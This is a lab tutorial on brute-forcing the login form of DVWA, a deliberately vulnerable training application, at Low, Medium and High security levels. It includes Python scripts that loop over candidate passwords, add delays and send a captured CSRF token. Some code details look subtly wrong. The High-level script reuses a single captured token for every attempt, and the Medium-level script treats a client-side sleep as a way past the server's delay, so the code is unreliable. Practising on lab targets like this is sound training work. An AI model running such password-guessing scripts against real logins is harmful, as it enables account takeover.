BRUTE FORCE - DVWA (Low/Medium/High)
Table of Contents
Introduction
This tutorial walks you through the process of performing brute force attacks on DVWA (Damn Vulnerable Web Application) at different security levels: Low, Medium, and High. Each level introduces specific protections that alter how brute force attacks can be executed. Understanding these methods is crucial for ethical hacking and web security practice.
Step 1: Setting Up DVWA
-
Install DVWA:
- Download DVWA from the official GitHub repository.
- Set it up on a local server such as XAMPP or MAMP.
-
Configure DVWA:
- Open the DVWA config file located in the
configdirectory. - Set the database details to match your local setup.
- Ensure that the database is created in MySQL.
- Open the DVWA config file located in the
-
Access DVWA:
- Open your web browser and navigate to the DVWA URL (usually
http://localhost/dvwa). - Log in using the default credentials (admin/password).
- Open your web browser and navigate to the DVWA URL (usually
Step 2: Brute Forcing at Low Security Level
-
Select Low Security:
- In the DVWA interface, navigate to the "DVWA Security" section.
- Set the security level to "Low".
-
Identify the Login Form:
- Go to the login page where you will perform the brute force attack.
-
Perform the Brute Force Attack:
- Use a tool like Burp Suite or a simple script to send multiple login attempts.
- Common tools/scripts can be found online, or you can write a Python script:
import requests url = "http://localhost/dvwa/vulnerabilities/brute/" usernames = ["admin"] passwords = ["password1", "password2", "password3"] for password in passwords: response = requests.post(url, data={'username': usernames[0], 'password': password}) if "Welcome" in response.text: print(f"Password found: {password}") break
Step 3: Brute Forcing at Medium Security Level
-
Select Medium Security:
- Set the security level to "Medium" in the DVWA settings.
-
Understand the Changes:
- The Medium level introduces a delay after each login attempt to slow down brute force attacks.
-
Modify Your Attack:
- Adjust your script or tool to accommodate the timing delay.
- You may need to implement a sleep function in your script:
import time for password in passwords: response = requests.post(url, data={'username': usernames[0], 'password': password}) time.sleep(2) # introduce a delay if "Welcome" in response.text: print(f"Password found: {password}") break
Step 4: Brute Forcing at High Security Level
-
Select High Security:
- Set the security level to "High" in the DVWA settings.
-
Learn About CSRF Tokens:
- The High level adds CSRF tokens to the form, which must be included in the request.
-
Capture the CSRF Token:
- Use Burp Suite or inspect element in your browser to find the token in the login form.
-
Modify Your Attack for CSRF:
- Update your script to include the CSRF token in the post request:
csrf_token = "your_captured_token" for password in passwords: response = requests.post(url, data={'username': usernames[0], 'password': password, 'csrf_token': csrf_token}) if "Welcome" in response.text: print(f"Password found: {password}") break
- Update your script to include the CSRF token in the post request:
Conclusion
In this tutorial, you learned how to execute brute force attacks on DVWA at different security levels. Each level introduces unique challenges, from simple login forms to delays and CSRF protection. Always remember to use these techniques ethically and responsibly, focusing on improving security practices rather than exploiting vulnerabilities. Next steps could involve exploring further security measures or delving into other aspects of web application security.